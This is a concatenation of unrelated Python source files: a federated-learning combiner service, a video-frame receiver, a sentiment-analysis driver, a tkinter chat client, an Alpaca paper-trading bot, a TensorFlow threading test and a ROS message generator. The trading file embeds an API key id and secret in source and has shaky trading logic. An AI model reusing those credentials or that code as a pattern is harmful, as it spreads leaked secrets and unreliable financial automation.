request.receiver.role = fedn.WORKER
self.SendModelUpdateRequest(request, self)
print("COMBINER: Sent model update request for model {} to clients {}".format(model_id,clients), flush=True)
def request_model_validation(self, model_id, clients=[]):
""" Ask clients to validate the current global model.
Parameters
----------
model_id : str
The id of the model to be updated.
clients : list
List of clients to submit a model update request to.
An empty list (default) results in a broadcast to
all connected training clients.
"""
request = fedn.ModelValidationRequest()
self.__whoami(request.sender, self)
request.model_id = model_id
request.correlation_id = str(uuid.uuid4())
request.timestamp = str(datetime.now())
if len(clients) == 0:
clients = self.get_active_validators()
for client in clients:
request.receiver.name = client.name
request.receiver.role = fedn.WORKER
self.SendModelValidationRequest(request, self)
print("COMBINER: Sent validation request for model {} to clients {}".format(model_id,clients), flush=True)
def _list_clients(self, channel):
request = fedn.ListClientsRequest()
self.__whoami(request.sender, self)
request.channel = channel
clients = self.ListActiveClients(request, self)
return clients.client
def get_active_trainers(self):
"""
:return:
"""
trainers = self._list_clients(fedn.Channel.MODEL_UPDATE_REQUESTS)
return trainers
def get_active_validators(self):
"""
:return:
"""
validators = self._list_clients(fedn.Channel.MODEL_VALIDATION_REQUESTS)
return validators
def nr_active_trainers(self):
"""
:return:
"""
return len(self.get_active_trainers())
def nr_active_validators(self):
"""
:return:
"""
return len(self.get_active_validators())
####################################################################################################################
def __join_client(self, client):
""" Add a client to the combiner. """
if not client.name in self.clients.keys():
self.clients[client.name] = {"lastseen": datetime.now()}
def _subscribe_client_to_queue(self, client, queue_name):
self.__join_client(client)
if not queue_name in self.clients[client.name].keys():
self.clients[client.name][queue_name] = queue.Queue()
def __get_queue(self, client, queue_name):
try:
return self.clients[client.name][queue_name]
except KeyError:
raise
def __get_status_queue(self, client):
return self.__get_queue(client, fedn.Channel.STATUS)
def _send_request(self, request, queue_name):
self.__route_request_to_client(request, request.receiver, queue_name)
def _broadcast_request(self, request, queue_name):
""" Publish a request to all subscribed members. """
active_clients = self._list_active_clients(queue_name)
for client in active_clients:
self.clients[client.name][queue_name].put(request)
def __route_request_to_client(self, request, client, queue_name):
try:
q = self.__get_queue(client, queue_name)
q.put(request)
except:
print("Failed to route request to client: {} {}", request.receiver, queue_name)
raise
def _send_status(self, status):
self.tracer.report(status)
for name, client in self.clients.items():
try:
q = client[fedn.Channel.STATUS]
status.timestamp = str(datetime.now())
q.put(status)
except KeyError:
pass
def __register_heartbeat(self, client):
""" Register a client if first time connecting. Update heartbeat timestamp. """
self.__join_client(client)
self.clients[client.name]["lastseen"] = datetime.now()
#####################################################################################################################
## Control Service
def Start(self, control: fedn.ControlRequest, context):
""" Push a round config to RoundControl.
:param control:
:param context:
:return:
"""
response = fedn.ControlResponse()
print("\n\n GOT CONTROL **START** from Command {}\n\n".format(control.command), flush=True)
config = {}
for parameter in control.parameter:
config.update({parameter.key: parameter.value})
print("\n\nSTARTING ROUND AT COMBINER WITH ROUND CONFIG: {}\n\n".format(config), flush=True)
job_id = self.control.push_round_config(config)
return response
def Configure(self, control: fedn.ControlRequest, context):
"""
:param control:
:param context:
:return:
"""
response = fedn.ControlResponse()
for parameter in control.parameter:
setattr(self, parameter.key, parameter.value)
return response
def Stop(self, control: fedn.ControlRequest, context):
"""
:param control:
:param context:
:return:
"""
response = fedn.ControlResponse()
print("\n\n\n\n\n GOT CONTROL **STOP** from Command\n\n\n\n\n", flush=True)
return response
def Report(self, control: fedn.ControlRequest, context):
""" Descibe current state of the Combiner. """
response = fedn.ControlResponse()
print("\n\n\n\n\n GOT CONTROL **REPORT** from Command\n\n\n\n\n", flush=True)
active_trainers = self.get_active_trainers()
p = response.parameter.add()
p.key = "nr_active_trainers"
p.value = str(len(active_trainers))
active_validators = self.get_active_validators()
p = response.parameter.add()
p.key = "nr_active_validators"
p.value = str(len(active_validators))
active_trainers_ = self.get_active_trainers()
active_trainers = []
for client in active_trainers_:
active_trainers.append(client)
p = response.parameter.add()
p.key = "active_trainers"
p.value = str(active_trainers)
active_validators_ = self.get_active_validators()
active_validators = []
for client in active_validators_:
active_validators.append(client)
p = response.parameter.add()
p.key = "active_validators"
p.value = str(active_validators)
p = response.parameter.add()
p.key = "nr_active_clients"
p.value = str(len(active_trainers)+len(active_validators))
p = response.parameter.add()
p.key = "model_id"
model_id = self.get_active_model()
if model_id == None:
model_id = ""
p.value = str(model_id)
p = response.parameter.add()
p.key = "nr_unprocessed_compute_plans"
p.value = str(self.control.round_configs.qsize())
p = response.parameter.add()
p.key = "name"
p.value = str(self.id)
return response
#####################################################################################################################
def AllianceStatusStream(self, response, context):
""" A server stream RPC endpoint that emits status messages. """
status = fedn.Status(status="Client {} connecting to AllianceStatusStream.".format(response.sender))
status.log_level = fedn.Status.INFO
status.sender.name = self.id
status.sender.role = role_to_proto_role(self.role)
self._subscribe_client_to_queue(response.sender, fedn.Channel.STATUS)
q = self.__get_queue(response.sender, fedn.Channel.STATUS)
self._send_status(status)
while True:
yield q.get()
def SendStatus(self, status: fedn.Status, context):
"""
:param status:
:param context:
:return:
"""
# Add the status message to all subscribers of the status channel
self._send_status(status)
response = fedn.Response()
response.response = "Status received."
return response
def _list_subscribed_clients(self, queue_name):
subscribed_clients = []
for name, client in self.clients.items():
if queue_name in client.keys():
subscribed_clients.append(name)
return subscribed_clients
def _list_active_clients(self, channel):
active_clients = []
for client in self._list_subscribed_clients(channel):
# This can break with different timezones.
now = datetime.now()
then = self.clients[client]["lastseen"]
# TODO: move the heartbeat timeout to config.
if (now - then) < timedelta(seconds=10):
active_clients.append(client)
return active_clients
def _drop_inactive_clients(self):
""" Clean up clients that has missed heartbeat """
def ListActiveClients(self, request: fedn.ListClientsRequest, context):
""" RPC endpoint that returns a ClientList containing the names of all active clients.
An active client has sent a status message / responded to a heartbeat
request in the last 10 seconds.
"""
clients = fedn.ClientList()
active_clients = self._list_active_clients(request.channel)
for client in active_clients:
clients.client.append(fedn.Client(name=client, role=fedn.WORKER))
return clients
def AcceptingClients(self, request: fedn.ConnectionRequest, context):
"""
:param request:
:param context:
:return:
"""
response = fedn.ConnectionResponse()
active_clients = self._list_active_clients(fedn.Channel.MODEL_UPDATE_REQUESTS)
try:
requested = int(self.max_clients)
if len(active_clients) >= requested:
response.status = fedn.ConnectionStatus.NOT_ACCEPTING
return response
if len(active_clients) < requested:
response.status = fedn.ConnectionStatus.ACCEPTING
return response
except Exception as e:
print("Combiner not properly configured! {}".format(e), flush=True)
raise
response.status = fedn.ConnectionStatus.TRY_AGAIN_LATER
return response
def SendHeartbeat(self, heartbeat: fedn.Heartbeat, context):
""" RPC that lets clients send a hearbeat, notifying the server that
the client is available. """
self.__register_heartbeat(heartbeat.sender)
response = fedn.Response()
response.sender.name = heartbeat.sender.name
response.sender.role = heartbeat.sender.role
response.response = "Heartbeat received"
return response
## Combiner Service
def ModelUpdateStream(self, update, context):
"""
:param update:
:param context:
"""
client = update.sender
status = fedn.Status(status="Client {} connecting to ModelUpdateStream.".format(client.name))
status.log_level = fedn.Status.INFO
status.sender.name = self.id
status.sender.role = role_to_proto_role(self.role)
self._subscribe_client_to_queue(client, fedn.Channel.MODEL_UPDATES)
q = self.__get_queue(client, fedn.Channel.MODEL_UPDATES)
self._send_status(status)
while context.is_active():
try:
yield q.get(timeout=1.0)
except queue.Empty:
pass
def ModelUpdateRequestStream(self, response, context):
""" A server stream RPC endpoint. Messages from client stream. """
client = response.sender
metadata = context.invocation_metadata()
if metadata:
print("\n\n\nGOT METADATA: {}\n\n\n".format(metadata), flush=True)
status = fedn.Status(status="Client {} connecting to ModelUpdateRequestStream.".format(client.name))
status.log_level = fedn.Status.INFO
status.timestamp = str(datetime.now())
self.__whoami(status.sender, self)
self._subscribe_client_to_queue(client, fedn.Channel.MODEL_UPDATE_REQUESTS)
q = self.__get_queue(client, fedn.Channel.MODEL_UPDATE_REQUESTS)
self._send_status(status)
while context.is_active():
try:
yield q.get(timeout=1.0)
except queue.Empty:
pass
def ModelValidationStream(self, update, context):
"""
:param update:
:param context:
"""
client = update.sender
status = fedn.Status(status="Client {} connecting to ModelValidationStream.".format(client.name))
status.log_level = fedn.Status.INFO
status.sender.name = self.id
status.sender.role = role_to_proto_role(self.role)
self._subscribe_client_to_queue(client, fedn.Channel.MODEL_VALIDATIONS)
q = self.__get_queue(client, fedn.Channel.MODEL_VALIDATIONS)
self._send_status(status)
while context.is_active():
try:
yield q.get(timeout=1.0)
except queue.Empty:
pass
def ModelValidationRequestStream(self, response, context):
""" A server stream RPC endpoint. Messages from client stream. """
client = response.sender
status = fedn.Status(status="Client {} connecting to ModelValidationRequestStream.".format(client.name))
status.log_level = fedn.Status.INFO
status.sender.name = self.id
status.sender.role = role_to_proto_role(self.role)
status.timestamp = str(datetime.now())
self._subscribe_client_to_queue(client, fedn.Channel.MODEL_VALIDATION_REQUESTS)
q = self.__get_queue(client, fedn.Channel.MODEL_VALIDATION_REQUESTS)
self._send_status(status)
while context.is_active():
try:
yield q.get(timeout=1.0)
except queue.Empty:
pass
def SendModelUpdateRequest(self, request, context):
""" Send a model update request. """
self._send_request(request, fedn.Channel.MODEL_UPDATE_REQUESTS)
response = fedn.Response()
response.response = "CONTROLLER RECEIVED ModelUpdateRequest from client {}".format(request.sender.name)
return response # TODO Fill later
def SendModelUpdate(self, request, context):
""" Send a model update response. """
self.control.aggregator.on_model_update(request.model_update_id)
print("ORCHESTRATOR: Received model update", flush=True)
response = fedn.Response()
response.response = "RECEIVED ModelUpdate {} from client {}".format(response, response.sender.name)
return response # TODO Fill later
def SendModelValidationRequest(self, request, context):
""" Send a model update request. """
self._send_request(request, fedn.Channel.MODEL_VALIDATION_REQUESTS)
response = fedn.Response()
response.response = "CONTROLLER RECEIVED ModelValidationRequest from client {}".format(request.sender.name)
return response # TODO Fill later
def SendModelValidation(self, request, context):
""" Send a model update response. """
self.control.aggregator.on_model_validation(request)
print("ORCHESTRATOR received validation ", flush=True)
response = fedn.Response()
response.response = "RECEIVED ModelValidation {} from client {}".format(response, response.sender.name)
return response # TODO Fill later
## Reducer Service
def GetGlobalModel(self, request, context):
"""
:param request:
:param context:
:return:
"""
response = fedn.GetGlobalModelResponse()
self.__whoami(response.sender, self)
response.receiver.name = "reducer"
response.receiver.role = role_to_proto_role(Role.REDUCER)
if not self.get_active_model():
response.model_id = ''
else:
response.model_id = self.get_active_model()
return response
####################################################################################################################
def run(self):
"""
"""
import signal
print("COMBINER: {} started, ready for requests. ".format(self.id), flush=True)
try:
while True:
signal.pause()
except (KeyboardInterrupt, SystemExit):
pass
self.server.stop()
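# Shape of the connect_config dict expected by Combiner.__init__ (keys inferred
# from the reads above; the values shown are placeholders, not defaults):
#
# connect_config = {
#     "myname": "combiner0",
#     "myhost": "combiner0.example.com",
#     "myport": 12080,
#     "discover_host": "reducer.example.com",
#     "discover_port": 8090,
#     "token": "<auth token>",
#     "secure": True,
#     "max_clients": 30,
# }
# Combiner(connect_config).run()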
|
receive_video.py
|
import base64
from root import *
import cv2
import time
import pickle
from datetime import datetime
import redis
video_buffer = [b""]
video_buffer_lock = []
frame_size = [-1]
frame_size_lock = []
tmp_frame_size = [[]] # to be used when the frame size is changed in the receiver thread but not in the display thread
tmp_frame_size_lock = []
parallel_connections = 20
buffer_ready = False
def init_locks_and_buffers(number_of_connections):
global video_buffer, video_buffer_lock, frame_size, frame_size_lock, tmp_frame_size, tmp_frame_size_lock
video_buffer = []
frame_size = []
tmp_frame_size = []
video_buffer_lock = []
frame_size_lock = []
tmp_frame_size_lock = []
for i in range(number_of_connections):
video_buffer.append(b"")
frame_size.append(-1)
tmp_frame_size.append([])
video_buffer_lock.append(threading.Lock())
frame_size_lock.append(threading.Lock())
tmp_frame_size_lock.append(threading.Lock())
global buffer_ready
buffer_ready = True
def new_connection(ip):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # TCP socket
port = 12345
s.connect((ip, port))
return s
def receive_frames(s: socket.socket, connection_id, r: redis.Redis):
size = s.recv(1024)
global frame_size
frame_size[connection_id] = int(size.decode('utf-8'))
print('Video receiver : Frame size in bytes : ' + str(frame_size[connection_id]))
total_received_bytes = 0
while True:
global video_buffer
status = r.get("status").decode("utf-8")
if status != "call":
s.shutdown(socket.SHUT_RDWR)
s.close()
break
packet = s.recv(4096)
# todo solve the case when we are waiting for a packet (server should send "BYE")
if not packet:
print("Video receiver : No packet received !!!! Exiting the child video receiving thread.")
break
total_received_bytes += len(packet)
# This part is synchronized with the video server (every 25 frames)
# todo consider that the latency is actually way bigger for a frame because it has many packets
# todo fix the problem when the hosts don't have the same timezone
# todo what if this is exactly the size of 25 frames?
if total_received_bytes > 25 * frame_size[connection_id]:
packet_end = packet[len(packet) - 53:]
# print("Video receiver : Received packet seems to be the server time.")
# print("Video receiver : Datetime packet length : " + str(len(packet_end)))
sending_time = pickle.loads(packet_end)
# print("Video receiver : Received server time.")
delta = datetime.now() - sending_time
latency = abs(delta.total_seconds()) # todo check that the negative values are not actually a problem
# frame_latency = latency * (frame_size[connection_id] / 4096)
# print("Video receiver : Current packet latency : " + str(latency))
# print("Video receiver : Estimated video latency : " + str(frame_latency))
s.sendall(pickle.dumps(latency)) # todo make sure this is the most efficient way to sync
new_frame_size = s.recv(4096) # todo make sure it will only receive the new frame size
new_frame_size = int(new_frame_size.decode('utf-8'))
# print("Video receiver : Frame size changed by server to " + str(new_frame_size))
global tmp_frame_size
tmp_frame_size_lock[connection_id].acquire()
tmp_frame_size[connection_id].append(new_frame_size) # tmp_frame_size now has the changes of frame size in order.
tmp_frame_size_lock[connection_id].release()
buffer_string = "NEW_FRAME_SIZE"
packet = packet[:len(packet) - 53]
video_buffer_lock[connection_id].acquire()
video_buffer[connection_id] += packet
video_buffer[connection_id] += bytes(buffer_string, 'utf-8')
video_buffer_lock[connection_id].release()
total_received_bytes = 0
s.sendall(b"OK") # Send ACK
time.sleep(0.001)
continue
video_buffer_lock[connection_id].acquire()
try:
video_buffer[connection_id] += packet
except IndexError as e:
print("Exception" + str(e))
print("ID : " + str(connection_id))
print("Video buffer size : " + str(len(video_buffer)))
video_buffer_lock[connection_id].release()
time.sleep(0.001)
print('Video receiver : Exiting child video receiving thread.')
# s.close()
class ReceiveFrameThread(threading.Thread):
def __init__(self, thread_id, name, counter, correspondent_ip, r):
threading.Thread.__init__(self)
self.threadID = thread_id
self.name = name
self.counter = counter
self.correspondent_ip = correspondent_ip
self.r = r
def run(self):
init_locks_and_buffers(parallel_connections)
print("After buffer init : \n")
print(video_buffer)
connection_threads = []
for i in range(parallel_connections):
s = new_connection(self.correspondent_ip)
new_thread = threading.Thread(target=receive_frames, args=(s, i, self.r,))
new_thread.start()
print("Video receiver : Child thread started.")
connection_threads.append(new_thread)
# Join the threads
for th in connection_threads:
th.join()
print("Exiting the main video receiver thread.")
class DisplayFrameThread(threading.Thread):
def __init__(self, thread_id, name, counter, r: redis.Redis):
threading.Thread.__init__(self)
self.threadID = thread_id
self.name = name
self.counter = counter
self.r = r
def run(self) -> None:
print("Displaying frame thread started")
# This is to make sure buffers are initialized before reading frames
while not buffer_ready:
time.sleep(0.05)
global video_buffer
global frame_size
while 1:
status = self.r.get("status").decode('utf-8')
if status == "quit":
break
show_video = self.r.get("show_video").decode("utf-8")
if show_video == "FALSE":
# todo make this display a profile image
self.r.set("other_webcam", "")
for i in range(parallel_connections):
video_buffer_lock[i].acquire()
video_buffer[i] = b""
video_buffer_lock[i].release()
continue
for i in range(parallel_connections):
if len(video_buffer[i]) < len(bytes("NEW_FRAME_SIZE", 'utf-8')):
continue
video_buffer_lock[i].acquire()
start = video_buffer[i][:len(bytes("NEW_FRAME_SIZE", 'utf-8'))]
video_buffer_lock[i].release()
valid_string = True
try:
start = start.decode('utf-8')
except UnicodeDecodeError:
valid_string = False
if valid_string and start == "NEW_FRAME_SIZE":
# print("Video player : Changing frame size.")
video_buffer_lock[i].acquire()
video_buffer[i] = video_buffer[i][len(bytes("NEW_FRAME_SIZE", 'utf-8')):]
video_buffer_lock[i].release()
# global frame_size
global tmp_frame_size # todo check if I need a lock here
tmp_frame_size_lock[i].acquire()
frame_size[i] = tmp_frame_size[i][0]
tmp_frame_size[i] = tmp_frame_size[i][1:]
tmp_frame_size_lock[i].release()
continue
if len(video_buffer[i]) == 0 or frame_size[i] == -1 or len(video_buffer[i]) < frame_size[i]:
time.sleep(0.001)
continue
# If there is more than 1 second of video in the buffer, skip it (assuming 25 fps)
# todo see if this is actually useful, because the buffer itself is not the bottleneck
if len(video_buffer[i]) > frame_size[i] * 25:
video_buffer_lock[i].acquire()
video_buffer[i] = b""
print("Video player : Too many frames in the buffer, clearing buffer.")
video_buffer_lock[i].release()
continue
video_buffer_lock[i].acquire()
next_frame = video_buffer[i][:frame_size[i]]
video_buffer[i] = video_buffer[i][frame_size[i]:]
video_buffer_lock[i].release()
frame = pickle.loads(next_frame)
# Send the frame to Redis
success, encoded_image = cv2.imencode('.jpg', frame) # encode in jpg
content = encoded_image.tobytes() # convert to bytes
frame_base64 = base64.b64encode(content).decode('ascii') # base 64 ascii
self.r.set("other_webcam", frame_base64)
# Old way of displaying (keep while developing)
# cv2.namedWindow('frame', cv2.WND_PROP_FULLSCREEN)
# cv2.imshow('frame', frame)
# cv2.waitKey(1)
print("Exiting video playing thread.")
|
main.py
|
from xml_to_json import process_posts
from preprocessing import preprocess_text
from post_stats import generate_stats
from post_freqdist import generate_freqdist
from post_sentiment_analysis import sentiment_analysis
import json
import multiprocessing
def save_freqdist_to_file(input_path, output_path):
freq_per_year = generate_freqdist(input_path, filtertag1="c#", filtertag2="java")
with open(output_path, "w") as output_file:
json.dump(list(freq_per_year.values())[0], output_file)
def save_sentiment_analysis_to_file(input_path, output_path, year):
sentiment_analysis_result = sentiment_analysis(input_path, year, filtertag1="c#", filtertag2="java")
with open(output_path, "w") as output_file:
json.dump(sentiment_analysis_result, output_file)
def save_post_stats_to_file(input_path, output_path):
stats_per_year = generate_stats(input_path, filtertag1="c#", filtertag2="java")
data = {
"c#": list(stats_per_year.values())[0]["c#"].__dict__,
"java": list(stats_per_year.values())[0]["java"].__dict__
}
with open(output_path, "w") as output_file:
json.dump(data, output_file)
def main():
# Example usage: Saving sentiment analysis results to a json file
input_paths = {
'2015': "Your/Posts Data/Path/Posts2015.xml",
'2016': "Your/Posts Data/Path/Posts2016.xml",
'2017': "Your/Posts Data/Path/Posts2017.xml",
'2018': "Your/Posts Data/Path/Posts2018.xml",
'2019': "Your/Posts Data/Path/Posts2019.xml"
}
output_paths = {
'2015': "Your/Output Data/Path/SentimentAnalysis2015.json",
'2016': "Your/Output Data/Path/SentimentAnalysis2016.json",
'2017': "Your/Output Data/Path/SentimentAnalysis2017.json",
'2018': "Your/Output Data/Path/SentimentAnalysis2018.json",
'2019': "Your/Output Data/Path/SentimentAnalysis2019.json"
}
sentiment_analysis2015 = multiprocessing.Process(target=save_sentiment_analysis_to_file, args=(input_paths['2015'], output_paths['2015'], '2015'))
sentiment_analysis2016 = multiprocessing.Process(target=save_sentiment_analysis_to_file, args=(input_paths['2016'], output_paths['2016'], '2016'))
sentiment_analysis2017 = multiprocessing.Process(target=save_sentiment_analysis_to_file, args=(input_paths['2017'], output_paths['2017'], '2017'))
sentiment_analysis2018 = multiprocessing.Process(target=save_sentiment_analysis_to_file, args=(input_paths['2018'], output_paths['2018'], '2018'))
sentiment_analysis2019 = multiprocessing.Process(target=save_sentiment_analysis_to_file, args=(input_paths['2019'], output_paths['2019'], '2019'))
sentiment_analysis2015.start()
sentiment_analysis2016.start()
sentiment_analysis2017.start()
sentiment_analysis2018.start()
sentiment_analysis2019.start()
sentiment_analysis2015.join()
sentiment_analysis2016.join()
sentiment_analysis2017.join()
sentiment_analysis2018.join()
sentiment_analysis2019.join()
print('end')
if __name__=="__main__":
main()
|
node.py
|
from socket import AF_INET, socket, SOCK_STREAM
from threading import Thread
import tkinter
def receive():
"""Handles receiving of messages."""
while True:
try:
msg = client_socket.recv(BUFSIZ).decode("utf8")
msg_list.insert(tkinter.END, msg)
except OSError: # Possibly client has left the chat.
break
def send(event=None): # event is passed by binders.
"""Handles sending of messages."""
msg = my_msg.get()
my_msg.set("") # Clears input field.
client_socket.send(bytes(msg, "utf8"))
if msg == "{quit}":
client_socket.close()
top.quit()
def on_closing(event=None):
"""This function is to be called when the window is closed."""
my_msg.set("{quit}")
send()
top = tkinter.Tk()
top.title("Chatter")
messages_frame = tkinter.Frame(top)
my_msg = tkinter.StringVar() # For the messages to be sent.
my_msg.set("Type your messages here.")
scrollbar = tkinter.Scrollbar(messages_frame) # To navigate through past messages.
# Following will contain the messages.
msg_list = tkinter.Listbox(messages_frame, height=15, width=50, yscrollcommand=scrollbar.set)
scrollbar.pack(side=tkinter.RIGHT, fill=tkinter.Y)
msg_list.pack(side=tkinter.LEFT, fill=tkinter.BOTH)
msg_list.pack()
messages_frame.pack()
entry_field = tkinter.Entry(top, textvariable=my_msg)
entry_field.bind("<Return>", send)
entry_field.pack()
send_button = tkinter.Button(top, text="Send", command=send)
send_button.pack()
top.protocol("WM_DELETE_WINDOW", on_closing)
#----Now comes the sockets part----
HOST = "127.0.0.1"
PORT = 33000
BUFSIZ = 1024
ADDR = (HOST, PORT)
client_socket = socket(AF_INET, SOCK_STREAM)
client_socket.connect(ADDR)
receive_thread = Thread(target=receive)
receive_thread.start()
tkinter.mainloop() # Starts GUI execution.
|
strategy.py
|
# Importing various modules
import threading
import os
import abc
import time
import yfinance as yf
from alpaca_trade_api import REST
import pandas as pd
import numpy as np
import tensorflow as tf
from sklearn.model_selection import train_test_split
from sklearn.metrics import classification_report
from keras.layers import Dense
from keras.models import Sequential, model_from_json
# AlpacaPaperSocket class for the connection to Alpaca API using paper trading key_id, secret_id & base_url
class AlpacaPaperSocket(REST):
def __init__(self):
super().__init__(
key_id = 'PKARJ9A9ZP1H8K5A58TF',
secret_key = '68Bl3zDxWDGGT1l30y*******NdwtEEe6nRAxAzW',
base_url = 'https://paper-api.alpaca.markets'
)
# TradingSystem class with methods declared as abstract, so that implementations can be changed according to the needs of the system
class TradingSystem(abc.ABC):
def __init__(self, api, symbol, time_frame, system_id, system_label):
self.api = api
self.symbol = symbol
self.time_frame = time_frame
self.system_id = system_id
self.system_label = system_label
thread = threading.Thread(target = self.system_loop)
thread.start()
@abc.abstractmethod
def place_buy_order(self):
pass
@abc.abstractmethod
def place_sell_order(self):
pass
@abc.abstractmethod
def system_loop(self):
pass
# AI Portfolio Management development class which builds, trains and saves our AI model
class PMDevelopment:
def __init__(self):
data = pd.read_csv("stock_data.csv")
# Separating the dependent and independent variables
x = data['Delta Value']
y = data.drop(['Delta Value'], axis = 1)
# Splitting the Train & Test DataSet
x_train, x_test, y_train, y_test = train_test_split(x, y)
# Creating a Sequential Model
network = Sequential()
# Creating the Structure to our Neural network
network.add(Dense(1, input_shape = (1,), activation = 'tanh'))
network.add(Dense(3, activation = 'tanh'))
network.add(Dense(3, activation = 'tanh'))
#network.add(Dense(5, activation = 'tanh'))
#network.add(Dense(3, activation = 'tanh'))
network.add(Dense(3, activation = 'tanh'))
network.add(Dense(1, activation = 'tanh'))
#Compiling the network using rmsprop optimizer. We can also use Adam Optimizer
network.compile(optimizer = 'rmsprop', loss = 'hinge', metrics = ['accuracy'])
#Fitting(Training) the model to predict the Accuracy
network.fit(x_train.values, y_train.values, epochs = 100)
# Evaluating our model predictions
y_pred = network.predict(x_test.values)
y_pred = np.around(y_pred, 0)
print(classification_report(y_test, y_pred))
#Saving the structure to our json
strategy_model = network.to_json()
with open("model.json", "w") as json_file:
json_file.write(strategy_model)
#Saving our network weights to the HDF5
network.save_weights("result.h5")
#PMDevelopment()
# Portfolio Management Model class
class PortfolioMgmtModel:
def __init__(self):
data = pd.read_csv("stock_data.csv")
x = data['Delta Value']
y = data.drop(['Delta Value'], axis = 1)
# Reading Structure from Json
json_file = open("model.json", "r")
json = json_file.read()
json_file.close()
self.network = model_from_json(json)
# Reading weights from HDF5
self.network.load_weights("result.h5")
# Verifying weights & structure are loaded
y_pred = self.network.predict(x.values)
y_pred = np.around(y_pred, 0)
print(classification_report(y, y_pred))
PortfolioMgmtModel()
# Portfolio Management System class that runs the trading loop on live data
class PortfolioMgmtSystem(TradingSystem):
def __init__(self):
super().__init__(AlpacaPaperSocket(), 'IBM', 86400, 1, 'AI_PM')
self.AI = PortfolioMgmtModel()
# function for placing a buy order
def place_buy_order(self):
self.api.submit_order(
symbol = 'IBM',
qty = 1,
side = 'buy',
type = 'market',
time_in_force = 'day'
)
# function for placing a sell order
def place_sell_order(self):
self.api.submit_order(
symbol = 'IBM',
qty = 1,
side = 'sell',
type = 'market',
time_in_force = 'day'
)
# An infinite loop which will systematically make the trades
def system_loop(self):
this_week_close = 0
last_week_close = 0
delta = 0
day_cnt = 0
while(True):
# Wait before requesting more data (note: 1440 seconds is about 24 minutes; a full day would be 86400)
time.sleep(1440)
# Requesting EOD from IBM
data_req = self.api.get_barset('IBM', timeframe = '1D', limit = 1).df
# Creating the dataframe to predict
z = pd.DataFrame(
data = [[data_req['IBM']['close'][0]]], columns = 'Close'.split()
)
if(day_cnt == 7):
day_cnt = 0
last_week_close = this_week_close
this_week_close = z['Close']
delta = this_week_close - last_week_close
# AI will choose whether to Buy, Sell or Hold Stock
if(np.around(self.AI.network.predict([delta])) <= -0.5):
self.place_sell_order()
elif(np.around(self.AI.network.predict([delta])) >= 0.5):
self.place_buy_order()
PortfolioMgmtSystem()
|
dense_update_ops_no_tsan_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for state updating ops that may have benign race conditions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
class AssignOpTest(test.TestCase):
# NOTE(mrry): We exclude these tests from the TSAN TAP target, because they
# contain benign and deliberate data races when multiple threads update
# the same parameters without a lock.
def testParallelUpdateWithoutLocking(self):
with self.test_session() as sess:
ones_t = array_ops.fill([1024, 1024], 1.0)
p = variables.Variable(array_ops.zeros([1024, 1024]))
adds = [
state_ops.assign_add(
p, ones_t, use_locking=False) for _ in range(20)
]
variables.global_variables_initializer().run()
def run_add(add_op):
sess.run(add_op)
threads = [
self.checkedThread(
target=run_add, args=(add_op,)) for add_op in adds
]
for t in threads:
t.start()
for t in threads:
t.join()
vals = p.eval()
ones = np.ones((1024, 1024)).astype(np.float32)
self.assertTrue((vals >= ones).all())
self.assertTrue((vals <= ones * 20).all())
def testParallelAssignWithoutLocking(self):
with self.test_session() as sess:
ones_t = array_ops.fill([1024, 1024], float(1))
p = variables.Variable(array_ops.zeros([1024, 1024]))
assigns = [
state_ops.assign(p, math_ops.mul(ones_t, float(i)), False)
for i in range(1, 21)
]
variables.global_variables_initializer().run()
def run_assign(assign_op):
sess.run(assign_op)
threads = [
self.checkedThread(
target=run_assign, args=(assign_op,)) for assign_op in assigns
]
for t in threads:
t.start()
for t in threads:
t.join()
vals = p.eval()
# Assert every element is taken from one of the assignments.
self.assertTrue((vals > 0).all())
self.assertTrue((vals <= 20).all())
if __name__ == "__main__":
test.main()
|
generate_msgs.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Generates random ROS messages and publishes them to live topics.
Usage:
generate_msgs.py [TYPE [TYPE ...]]
[--no-type TYPE [TYPE ...]]
[--max-count NUM]
[--max-per-topic NUM]
[--max-topics NUM]
[--topics-per-type NUM]
[--interval SECONDS]
[--publish-prefix PREFIX]
[--publish-suffix SUFFIX]
[--no-latch]
[--verbose]
[--option KEY=VALUE [KEY=VALUE ...]]
Topic names default to "/generate_msgs/type", like "/generate_msgs/std_msgs/Bool".
Supports both ROS1 and ROS2, version detected from environment.
Stand-alone script, requires ROS1 / ROS2 Python libraries.
ROS1 requires ROS master to be running.
------------------------------------------------------------------------------
This file is part of grepros - grep for ROS bag files and live topics.
Released under the BSD License.
@author Erki Suurjaak
@created 05.02.2022
@modified 09.02.2022
------------------------------------------------------------------------------
"""
import argparse
import collections
import json
import os
import random
import re
import signal
import string
import subprocess
import sys
import threading
import time
import traceback
rospy = rclpy = None
if os.getenv("ROS_VERSION") != "2":
import genpy
import roslib.message
import rospy
else:
import builtin_interfaces.msg
import rclpy
import rclpy.duration
import rclpy.qos
import rclpy.time
import rosidl_runtime_py.utilities
## Configuration for argparse, as {description, epilog, args: [..], groups: {name: [..]}}
ARGUMENTS = {
"description": "Generates random ROS messages, publishes to live topics.",
"arguments": [
dict(args=["TYPES"], nargs="*", metavar="TYPE",
help="ROS message types to use if not all available,\n"
'(supports * wildcards, like "geometry_msgs/*")'),
dict(args=["-v", "--verbose"],
dest="VERBOSE", default=False, action="store_true",
help="print each emitted message"),
dict(args=["--no-type"],
dest="SKIP_TYPES", metavar="TYPE", nargs="+", default=[], action="append",
help="ROS message types to skip (supports * wildcards)"),
dict(args=["-m", "--max-count"],
dest="COUNT", metavar="NUM", default=0, type=int,
help="maximum number of messages to emit"),
dict(args=["--max-topics"],
dest="MAX_TOPICS", metavar="NUM", default=0, type=int,
help="maximum number of topics to emit"),
dict(args=["--max-per-topic"],
dest="MAX_PER_TOPIC", metavar="NUM", default=0, type=int,
help="number of messages to emit in each topic"),
dict(args=["--topics-per-type"],
